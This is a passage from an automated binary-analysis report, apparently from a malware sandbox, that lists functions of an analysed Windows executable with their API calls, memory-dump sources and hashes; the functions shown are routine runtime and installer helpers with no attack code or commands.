                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00433811: __EH_prolog3.LIBCMT ref: 00433818
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00454B40
                                                                                                                                                                            • Part of subcall function 00442782: RaiseException.KERNEL32(?,?,00441450,00000000,?,?,?,?,00441450,00000000,00497AC0,?), ref: 004427D3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3Last$ExceptionException@8FileH_prolog3_RaiseThrowWrite
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3362004152-1835203436
                                                                                                                                                                          • Opcode ID: 883f4af8b5c66e78b3749607076bf04ce6366cd34e25dcc2b72bc5b708a6ef03
                                                                                                                                                                          • Instruction ID: e47136b30ef714f49e2d0af0fa4202cd294e561ce9fbfd014f3520b77fbf3fc5
                                                                                                                                                                          • Opcode Fuzzy Hash: 883f4af8b5c66e78b3749607076bf04ce6366cd34e25dcc2b72bc5b708a6ef03
                                                                                                                                                                          • Instruction Fuzzy Hash: 56018FB1500108AFDB10EBA0CC81FEEB378FF04308F40826EB509A6181EB749E49CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043FBF3, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043FBFD
                                                                                                                                                                            • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
                                                                                                                                                                          • wsprintfW.USER32 ref: 0043FC3F
                                                                                                                                                                          • wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
                                                                                                                                                                            • Part of subcall function 0043F412: __EH_prolog3_GS.LIBCMT ref: 0043F41C
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorFreeLastString$wsprintfwvsprintf
                                                                                                                                                                          • String ID: %d: %s
                                                                                                                                                                          • API String ID: 244791219-204819183
                                                                                                                                                                          • Opcode ID: c6aa90fd246b48e40723a5880c24c4db7e7b03834f27aec6cc7b718825f7c7da
                                                                                                                                                                          • Instruction ID: f12eb98d6b1ce231bb8698339f195804834364bc8a70b3b7ddbbb2d88254e369
                                                                                                                                                                          • Opcode Fuzzy Hash: c6aa90fd246b48e40723a5880c24c4db7e7b03834f27aec6cc7b718825f7c7da
                                                                                                                                                                          • Instruction Fuzzy Hash: 460129B1904119ABDF20EBA0CC45ADD73BCBB04318F5041AAF619A6091DA389B89CF5C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042A58C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,00421B3C,?,?,00000000,?,?,?,?,?,?), ref: 0042A59C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0042A5AC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                                                                          • API String ID: 1646373207-2994018265
                                                                                                                                                                          • Opcode ID: 1a8a3d637dfd505bb417a7343b352d1ef99116b66e455568e02bca749859dc77
                                                                                                                                                                          • Instruction ID: d3a5c6ffab105312c75843d50b8a9f516f585f06e62e099db6795ced55b706cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a8a3d637dfd505bb417a7343b352d1ef99116b66e455568e02bca749859dc77
                                                                                                                                                                          • Instruction Fuzzy Hash: 35F04F32200119FFCF125F90ED04BEB7BAAEF08755F554426FA49A0060C776C9B0EB95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040C384, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                          • SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3502553090-1835203436
                                                                                                                                                                          • Opcode ID: ec58ad405b01f467ccf8307f0ab561f767984d1bac89d2cc34c2c45f892433a3
                                                                                                                                                                          • Instruction ID: 981eb43e0fddc467d5235909099b20ba7bcbfd9755a1045d248edb3a33cea4bd
                                                                                                                                                                          • Opcode Fuzzy Hash: ec58ad405b01f467ccf8307f0ab561f767984d1bac89d2cc34c2c45f892433a3
                                                                                                                                                                          • Instruction Fuzzy Hash: B7014871910602EBD700DF69C98965DBBF4BF08314F15C26BE448AB791C7B8E950DF88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004320F1, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00431978,?,?), ref: 00432103
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00432113
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: Advapi32.dll$RegDeleteKeyTransactedW
                                                                                                                                                                          • API String ID: 1646373207-2168864297
                                                                                                                                                                          • Opcode ID: 138fe6eebc37b519882cce5f69771769fb2abe975d68e260da15818f94720a6d
                                                                                                                                                                          • Instruction ID: abd84a48a6fd0def730c30cb06d7162be0f692238ad8e864dc2c0e7cc89314fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 138fe6eebc37b519882cce5f69771769fb2abe975d68e260da15818f94720a6d
                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF0A732204605BB8B211F669E08E5BFBEEFBD9B72B11943BF7C9D1010D6758441CB68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040C505, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0040C50C
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0040C76A,00000000,?,00000000,00000000,00000004,0040F0CB,?,00000000,?,00000001,00000044,0040EF7A,0047C4E4,?), ref: 0040C52E
                                                                                                                                                                          • SetLastError.KERNEL32(?,00000000,?,00000000,?,0040EECA,00000000,?,?,00000000,?,0040E94F,?), ref: 0040C572
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3502553090-1835203436
                                                                                                                                                                          • Opcode ID: bb35c17c1ace0882dc611001748745e53e58e5976201403884a6f50121b6237c
                                                                                                                                                                          • Instruction ID: 1ec89a7edc89e944a9e5ffbe6c393f063bdecd5f1924381b65c01bb3cce8ef58
                                                                                                                                                                          • Opcode Fuzzy Hash: bb35c17c1ace0882dc611001748745e53e58e5976201403884a6f50121b6237c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F016971800646EFCB01DF58C948689BFB1FF08314F11826AF8189B692C7B4EA50DF84
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040C487, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0040C48E
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0040C71D,00000000,?,00000000,00000004,0040F729,-00000004,?,00000001,?,00000000), ref: 0040C4B0
                                                                                                                                                                          • SetLastError.KERNEL32(?,00000000,?), ref: 0040C4F1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3502553090-1835203436
                                                                                                                                                                          • Opcode ID: 8fc513fe5c2de92c2321a02493d8acea480801458b836c3d458e046534d1c024
                                                                                                                                                                          • Instruction ID: ead6c2944030e3329fa535a29eb94df9cd90448a4718b737bfb3a6f6df8be5f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 8fc513fe5c2de92c2321a02493d8acea480801458b836c3d458e046534d1c024
                                                                                                                                                                          • Instruction Fuzzy Hash: A10148B1900646EFCB01DF58C989A9DBBF0FF08314F11C26AF4189B651C7B4AA50DF88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041C252, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0041C259
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0041B346,00000001,00000000,?,00000000,00000040,0041D5DF,00000004,00000000,?,00000000,00000000,0000003C,0041D56E,00000004), ref: 0041C27B
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000000,0000003C,0041D56E,00000004,0000007B,0000003C,0041CB54,?,?,00000001), ref: 0041C2B5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3502553090-1835203436
                                                                                                                                                                          • Opcode ID: 5eeb9ab5060062e095ece73b8a1a43d1b00dbf21c597526fd3edec0e9881c4de
                                                                                                                                                                          • Instruction ID: 79dcfcdfb1828f904c63e7600ba55bbe821edd839d2013e20bdec51be1a01b63
                                                                                                                                                                          • Opcode Fuzzy Hash: 5eeb9ab5060062e095ece73b8a1a43d1b00dbf21c597526fd3edec0e9881c4de
                                                                                                                                                                          • Instruction Fuzzy Hash: 19017C71800646EFCB01DF58C94869CBFB1FF08314F11C25AF4589B662C7B4AA60DF88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00416D36, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00416D3D
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,00416D04,00000000,00000001,00000000,?,00000001,0000006C,00417625,?,?,.ini,?,%ld,?), ref: 00416D5F
                                                                                                                                                                          • SetLastError.KERNEL32(?,?), ref: 00416D93
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3502553090-1835203436
                                                                                                                                                                          • Opcode ID: b33733fb8619fa10b6a356054a6a928c2e3ea7b251832d07473f2f73712f81ce
                                                                                                                                                                          • Instruction ID: 8956a3ec6d2ca124da9afe2835117fd3776a50f9ee80aa5e13b8ad628144bee9
                                                                                                                                                                          • Opcode Fuzzy Hash: b33733fb8619fa10b6a356054a6a928c2e3ea7b251832d07473f2f73712f81ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 98014B70900656EFC701DF69C549698BFF1FF08318F15C26AE4589BAA2C7B4AA50DF88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00433431, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00433438
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,00433246,00000000,00000001,?,0000006C,0043432D,?,00000000,00479DF8,?,00479DF8,00000000,00000001,00000000,00000001), ref: 0043345A
                                                                                                                                                                          • SetLastError.KERNEL32(?,?), ref: 0043348E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3502553090-1835203436
                                                                                                                                                                          • Opcode ID: 851d96114caab5a466079463647a98f3391b0d9cb89e6e7bf710273556ab4542
                                                                                                                                                                          • Instruction ID: 04a142ce2919f2a2a9e34600752f1ca6ae56aef052629c6f78d6974c90cb667c
                                                                                                                                                                          • Opcode Fuzzy Hash: 851d96114caab5a466079463647a98f3391b0d9cb89e6e7bf710273556ab4542
                                                                                                                                                                          • Instruction Fuzzy Hash: ED014B70900646EFD701DF69C509658BFB1FF08318F15C26AF4589B662C7B4AA54DF88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456EE8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetProcessId,?,00457D5A,?), ref: 00456EF5
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00456EFC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: GetProcessId$kernel32.dll
                                                                                                                                                                          • API String ID: 1646373207-399901964
                                                                                                                                                                          • Opcode ID: 1730a65b3115402ae97b5297904e8f5a402d3da4e57fc197ac9186e856ff9645
                                                                                                                                                                          • Instruction ID: c09d09f3c34abadc8d80d0c9b07fe9cff1ef65861fe8313c3bf41c7c6f635d83
                                                                                                                                                                          • Opcode Fuzzy Hash: 1730a65b3115402ae97b5297904e8f5a402d3da4e57fc197ac9186e856ff9645
                                                                                                                                                                          • Instruction Fuzzy Hash: C5D012722446097BDF103FF5BC0DD6A3B5DDA40A623554436F50DC1152DA79C550975C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00439157, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories,?,0043AE99,runprerequisites,00000000,00000000,00000000,?), ref: 00439164
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0043916B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: SetDefaultDllDirectories$kernel32.dll
                                                                                                                                                                          • API String ID: 1646373207-2102062458
                                                                                                                                                                          • Opcode ID: ce868e3f7e211d78d939585cbe7dcad43f2727169a33bf9ad23cd38a1499c266
                                                                                                                                                                          • Instruction ID: 6f65e85fbc7817077e697e109dbb7edaa7f436e34563800ad968d516eb844be3
                                                                                                                                                                          • Opcode Fuzzy Hash: ce868e3f7e211d78d939585cbe7dcad43f2727169a33bf9ad23cd38a1499c266
                                                                                                                                                                          • Instruction Fuzzy Hash: D2C0122134021226DA6027B42C0DB9719499B09A62B56406AB10DE1281CDB8CC404798
